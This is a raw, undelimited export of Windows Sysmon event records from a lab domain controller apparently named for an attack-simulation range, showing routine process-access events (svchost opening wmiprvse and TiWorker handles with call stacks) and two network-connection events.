12:02:25.994{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.994{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000006314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.545{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53583-false52.250.195.204-443https 354300x80000000000000006313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.385{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61929- 10341000x80000000000000006312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 